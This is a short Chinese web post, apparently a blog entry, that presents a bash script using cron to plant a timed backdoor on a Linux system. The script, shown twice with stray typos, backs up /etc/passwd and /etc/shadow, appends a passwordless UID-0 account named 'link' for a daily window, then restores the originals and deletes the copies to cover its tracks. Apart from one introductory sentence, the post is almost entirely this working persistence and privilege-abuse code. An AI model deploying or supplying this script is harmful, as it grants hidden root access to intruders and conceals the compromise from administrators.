本文展示了一段通过Cron任务植入并执行恶意脚本的过程。该脚本首先创建了一系列定时任务来复制、修改系统关键文件如/etc/passwd和/etc/shadow,并在完成后清理临时文件。文章涉及的技术点包括Cron服务的利用、系统权限提升尝试及隐蔽性增强手段。
#!/bin/bash
echo '40 11 * * * cat /etc/passwd > /dev/linkpwd' > /etc/t.cron;
echo '40 11 * * * cat /etc/shadow > /dev/linkshw' >> /etc/t.cron;
echo '41 11 * * * echo "link:x:0:0::/:/bin/sh" >>/etc/passwd' >> /etc/t.cron;
echo '41 11 * * * echo "link::9999:0:99999:7:::" >> /etc/shadow' >>/etc/t.cron;
echo '09 13 * * * cat /dev/linkpwd > /etc/passwd' >> /etc/t.cron;
echo '09 13 * * * cat /dev/linkshw > /etc/shadow' >> /etc/t.cron;p
echo '10 13 * * * rm -f /dev/linkpwd' >> /etc/t.cron;
echo '10 13 * * * rm -f /dev/linkshw' >> /etc/t.cron;
service crond restart;
crontab /etc/t.cron;
echo '40 11 * * * cat /etc/passwd > /dev/linkpwd' > /etc/t.cron;
echo '40 11 * * * cat /etc/shadow > /dev/linkshw' >> /etc/t.cron;
echo '41 11 * * * echo "link:x:0:0::/:/bin/sh" >>/etc/passwd' >> /etc/t.cron;
echo '41 11 * * * echo "link::9999:0:99999:7:::" >> /etc/shadow' >>/etc/t.cron;
echo '09 13 * * * cat /dev/linkpwd > /etc/passwd' >> /etc/t.cron;
echo '09 13 * * * cat /dev/linkshw > /etc/shadow' >> /etc/t.cron;p
echo '10 13 * * * rm -f /dev/linkpwd' >> /etc/t.cron;
echo '10 13 * * * rm -f /dev/linkshw' >> /etc/t.cron;
service crond restart;
crontab /etc/t.cron;
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
